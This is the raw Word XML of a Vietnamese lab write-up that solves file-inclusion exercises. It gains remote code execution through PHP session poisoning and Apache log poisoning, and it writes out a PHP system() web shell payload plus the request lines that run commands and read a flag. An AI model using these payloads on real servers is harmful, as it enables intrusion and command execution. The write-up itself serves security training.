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2E872" w14:textId="0091E04D" w:rsidR="00C60912" w:rsidRDefault="00EB4C22" w:rsidP="00EB4C22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB4C22">
        <w:t>Use any of the techniques covered in this section to gain RCE, then submit the output of the following command: pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B0AFAA" w14:textId="2958D4A0" w:rsidR="00810ABB" w:rsidRPr="00810ABB" w:rsidRDefault="00810ABB" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Cách 1 :</w:t>
      </w:r>
      <w:r w:rsidRPr="00810ABB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CAD2E2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00810ABB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHP Session Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E11B9A" w14:textId="6E7C7EE3" w:rsidR="00810ABB" w:rsidRDefault="00810ABB" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra php session trên trình duyệt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC67FD7" w14:textId="3E4DBB5F" w:rsidR="00810ABB" w:rsidRDefault="00810ABB" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4719FA43" wp14:editId="1BBA1ED2">
            <wp:extent cx="5943600" cy="1831975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1862411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111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3F08" w14:textId="354BD220" w:rsidR="003C1B1D" w:rsidRDefault="003C1B1D" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta tìm được PHPSESSID = </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1B1D">
        <w:t>iurk3s7rjjsjo2bvst7rqvqvtn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA30FE" w14:textId="53D37E84" w:rsidR="00734B0E" w:rsidRDefault="00734B0E" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Giá </w:t>
      </w:r>
      <w:r w:rsidRPr="00734B0E">
        <w:t>trị cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHPSESSID</w:t>
      </w:r>
      <w:r w:rsidRPr="00734B0E">
        <w:t xml:space="preserve"> được lưu trữ tại /var/lib/php/sessions/sess_ </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1B1D">
        <w:t>iurk3s7rjjsjo2bvst7rqvqvtn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5158CE" w14:textId="6C92B454" w:rsidR="00734B0E" w:rsidRDefault="00734B0E" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00734B0E">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>Đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00734B0E">
        <w:t>ưa tệp phiên này qua lỗ hổng LFI và xem nội dung của nó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C152F4" w14:textId="6E516458" w:rsidR="00734B0E" w:rsidRDefault="00734B0E" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00734B0E">
        <w:t>/var/lib/php/sessions/sess_</w:t>
      </w:r>
      <w:r w:rsidR="00597F0D" w:rsidRPr="00597F0D">
        <w:t>iurk3s7rjjsjo2bvst7rqvqvtn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A098F9" w14:textId="49E07644" w:rsidR="00597F0D" w:rsidRDefault="00597F0D" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F657909" w14:textId="76265D8B" w:rsidR="00597F0D" w:rsidRDefault="00597F0D" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00597F0D">
        <w:t>index.php?language=/var/lib/php/sessions/sess_iurk3s7rjjsjo2bvst7rqvqvtn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A6857" w14:textId="78E6B888" w:rsidR="00597F0D" w:rsidRDefault="00597F0D" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B6F341" w14:textId="0D9A8353" w:rsidR="00597F0D" w:rsidRDefault="00597F0D" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BACCCFB" wp14:editId="4623239F">
            <wp:extent cx="5943600" cy="2153285"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25457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72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B27" w14:textId="7CCB42E9" w:rsidR="009677D0" w:rsidRDefault="009677D0" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t>ệp phiên chứa hai giá trị: </w:t>
      </w:r>
      <w:r>
        <w:t>selected_language(</w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t xml:space="preserve">hiển thị trang ngôn ngữ đã chọn </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t>và preference</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t>hiển thị ngôn ngữ đã chọn</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009FCF1" w14:textId="35E2EA63" w:rsidR="009677D0" w:rsidRDefault="009677D0" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Giá trị </w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t> preference không nằm trong tầm kiểm soát của chúng tôi vì chúng tôi không chỉ định nó ở bất kỳ đâu và phải được chỉ định tự động</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903C154" w14:textId="745B2A42" w:rsidR="009677D0" w:rsidRDefault="009677D0" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t>iá trị nằm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> selected_language</w:t>
      </w:r>
      <w:r w:rsidRPr="009677D0">
        <w:t xml:space="preserve"> trong tầm kiểm soát của chúng tôi vì chúng tôi có thể kiểm soát nó thông qua tham số</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ?language=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E23524" w14:textId="77777777" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BD72B3" w14:textId="7F2119FC" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="006E739A">
        <w:t>hực hiện poisoningbước này bằng cách viết mã PHP vào tệp phiên. Chúng ta có thể viết một web shell PHP cơ bản bằng cách thay đổi </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="006E739A">
        <w:t>?language= thành một web shell được mã hóa URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B54C3" w14:textId="6D034081" w:rsidR="009F0B04" w:rsidRDefault="009F0B04" w:rsidP="00810ABB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta mã hóa url  payload shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B41E69" w14:textId="3C63AECF" w:rsidR="009F0B04" w:rsidRDefault="009F0B04" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07774F13" wp14:editId="79EE93D7">
            <wp:extent cx="5943600" cy="3331210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1289861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615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680B" w14:textId="1408CE56" w:rsidR="009F0B04" w:rsidRDefault="009F0B04" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFA8CB" w14:textId="5E15414D" w:rsidR="009F0B04" w:rsidRDefault="009F0B04" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009F0B04">
        <w:t>%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B1C55" w14:textId="717BF5FB" w:rsidR="009F0B04" w:rsidRDefault="009F0B04" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5D93BD" w14:textId="77777777" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C153A0B" w14:textId="77777777" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD4EADB" w14:textId="77777777" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24110DB6" w14:textId="71411C4D" w:rsidR="00BD5507" w:rsidRDefault="00BD5507" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772E0625" w14:textId="1591FECB" w:rsidR="00BD5507" w:rsidRDefault="00BD5507" w:rsidP="006E739A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD5507">
        <w:t>/index.php?language</w:t>
      </w:r>
      <w:r w:rsidR="006E739A">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="006E739A" w:rsidRPr="009F0B04">
        <w:t>%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D9331" w14:textId="52DF0442" w:rsidR="00BD5507" w:rsidRDefault="00BD5507" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7905A" w14:textId="79F3A737" w:rsidR="00BD5507" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18E3059A" wp14:editId="2778DCC1">
            <wp:extent cx="5943600" cy="1715135"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210025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516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8A86" w14:textId="1F16C75D" w:rsidR="00B54E4C" w:rsidRDefault="00B54E4C" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCBC61E" w14:textId="32027A3C" w:rsidR="00B54E4C" w:rsidRDefault="00B54E4C" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54E4C">
        <w:t>/index.php?language=/var/lib/php/sessions/sess_iurk3s7rjjsjo2bvst7rqvqvtn</w:t>
      </w:r>
      <w:r w:rsidR="006E739A">
        <w:t>&amp;cmd=pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6997FE" w14:textId="7F4DFE3A" w:rsidR="00B54E4C" w:rsidRDefault="00B54E4C" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E846E3F" w14:textId="40491D01" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FEA7F50" wp14:editId="23112399">
            <wp:extent cx="5943600" cy="2070735"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="162265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592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8B76" w14:textId="20AC7051" w:rsidR="006E739A" w:rsidRDefault="006E739A" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>P/s:/var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF41E29" w14:textId="77777777" w:rsidR="00DA433C" w:rsidRDefault="00DA433C" w:rsidP="00DA433C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cách 2 : </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server Log Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA05D7" w14:textId="530EED88" w:rsidR="00640838" w:rsidRDefault="00640838" w:rsidP="00DA433C">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra máy chủ đích là loại gì </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617599D8" w14:textId="0CF91E7E" w:rsidR="00C954DE" w:rsidRDefault="00C954DE" w:rsidP="00DA433C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13721C" wp14:editId="4AF4A4AF">
            <wp:extent cx="5943600" cy="1433195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1951223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233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75FA" w14:textId="3B0AE2E5" w:rsidR="00077482" w:rsidRDefault="00C954DE" w:rsidP="00077482">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Máy chủ apache</w:t>
      </w:r>
      <w:r w:rsidR="004C0D90">
        <w:t xml:space="preserve"> /2.4.41 (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B59CB0" w14:textId="0D596F0B" w:rsidR="00C954DE" w:rsidRDefault="00C954DE" w:rsidP="00DA433C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ta đọc log của máy chủ apache bằng lỗ hổng LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1496A6" w14:textId="7BE06BD9" w:rsidR="000B168D" w:rsidRDefault="000B168D" w:rsidP="00DA433C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101BC32" w14:textId="20902A8B" w:rsidR="000B168D" w:rsidRDefault="000B168D" w:rsidP="00DA433C">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="000B168D">
        <w:t>/index.php?language=/var/log/apache2/access.lo</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B77126A" w14:textId="6E26EA3F" w:rsidR="00077482" w:rsidRDefault="000B168D" w:rsidP="001F2340">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17091ABD" w14:textId="6201439E" w:rsidR="001F2340" w:rsidRDefault="001F2340" w:rsidP="004E46BB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="658BE1E8" wp14:editId="1348E286">
            <wp:extent cx="5943600" cy="1579880"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1372817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173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BEA9" w14:textId="073CD047" w:rsidR="004E46BB" w:rsidRDefault="004E46BB" w:rsidP="004E46BB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chèn payload </w:t>
      </w:r>
      <w:r w:rsidR="00606436">
        <w:t xml:space="preserve">vào useragent rồi gửi đi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C18DD73" w14:textId="0B561756" w:rsidR="004E46BB" w:rsidRDefault="004E46BB" w:rsidP="004E46BB">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D93ADF" w14:textId="77777777" w:rsidR="001F2340" w:rsidRPr="001F2340" w:rsidRDefault="001F2340" w:rsidP="001F2340">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001F2340">
        <w:t>&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC31AE0" w14:textId="5D0019E7" w:rsidR="00606436" w:rsidRDefault="004E46BB" w:rsidP="001F2340">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F41F67" w14:textId="5191AA7B" w:rsidR="001F2340" w:rsidRDefault="001F2340" w:rsidP="00606436">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C461948" wp14:editId="279C4DDA">
            <wp:extent cx="5943600" cy="1475105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="146196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619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6EF0" w14:textId="77777777" w:rsidR="001F2340" w:rsidRDefault="001F2340" w:rsidP="00606436">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62EE6E74" w14:textId="4D13AC62" w:rsidR="00606436" w:rsidRPr="00C954DE" w:rsidRDefault="00606436" w:rsidP="00606436">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Include file log và thực thi shell đã được truyền qua /var/log/apache2/apache.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A44568" w14:textId="25F727B5" w:rsidR="00361685" w:rsidRDefault="001F2340" w:rsidP="001F2340">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15BB068D" wp14:editId="4B0A9845">
            <wp:extent cx="5943600" cy="1273810"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="561056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63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4724" w14:textId="514C62B6" w:rsidR="001F2340" w:rsidRDefault="001F2340" w:rsidP="001F2340">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E108F" w14:textId="1205DED9" w:rsidR="001F2340" w:rsidRDefault="001F2340" w:rsidP="001F2340">
      <w:r w:rsidRPr="001F2340">
        <w:t>index.php?language=/var/log/apache2/access.log&amp;cmd=pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAC19F" w14:textId="327A2A25" w:rsidR="001F2340" w:rsidRDefault="001F2340" w:rsidP="001F2340">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638E0013" w14:textId="77777777" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45736CF0" w14:textId="77777777" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A8AF57B" w14:textId="77777777" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E21A54A" w14:textId="77777777" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74392B57" w14:textId="33E76E3E" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="009F0B04">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C9A686" w14:textId="36DF151B" w:rsidR="00EB4C22" w:rsidRDefault="00EB4C22" w:rsidP="00EB4C22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB4C22">
        <w:t>Try to use a different technique to gain RCE and read the flag at /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B458B52" w14:textId="098096C4" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6907D291" w14:textId="06688203" w:rsidR="006D249B" w:rsidRDefault="006D249B" w:rsidP="006D249B">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD5507">
        <w:t>/index.php?language</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="009F0B04">
        <w:t>%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD963A8" w14:textId="2D7E36E7" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00361685">
        <w:t>/index.php?language=/var/lib/php/sessions/sess_iurk3s7rjjsjo2bvst7rqvqvtn&amp;cmd=ls+-l+/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BAEA48" w14:textId="05A96B04" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426546FD" w14:textId="753BEA00" w:rsidR="00BF6D7B" w:rsidRDefault="00361685" w:rsidP="0064445A">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="012F2300" wp14:editId="241A2F6F">
            <wp:extent cx="5943600" cy="4748530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="171545251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16571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3DA8" w14:textId="21A72609" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6974D9" w14:textId="77777777" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD5507">
        <w:t>/index.php?language</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="009F0B04">
        <w:t>%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%20%3F%3E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AAECDE" w14:textId="77777777" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356D1F7F" w14:textId="329BC8C8" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00361685">
        <w:t>/index.php?language=/var/lib/php/sessions/sess_iurk3s7rjjsjo2bvst7rqvqvtn&amp;cmd=</w:t>
      </w:r>
      <w:r w:rsidR="00866ACF" w:rsidRPr="00866ACF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00866ACF" w:rsidRPr="00866ACF">
        <w:t>cat+/c85ee5082f4c723ace6c0796e3a3db09.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F989B19" w14:textId="570158F2" w:rsidR="00361685" w:rsidRDefault="00361685" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EE09FC" w14:textId="75A247B5" w:rsidR="0064445A" w:rsidRDefault="00866ACF" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA5F18C" wp14:editId="40042DDE">
            <wp:extent cx="5943600" cy="1788160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="119123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391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DBA2" w14:textId="77777777" w:rsidR="00C33038" w:rsidRDefault="00C33038" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B619A6" w14:textId="58C7616E" w:rsidR="00C33038" w:rsidRDefault="00C33038" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cach 2 Dau doc log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C015C" w14:textId="48E4B9BB" w:rsidR="0064445A" w:rsidRDefault="0064445A" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B0827" w14:textId="7B4748A5" w:rsidR="0064445A" w:rsidRDefault="0064445A" w:rsidP="00361685">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
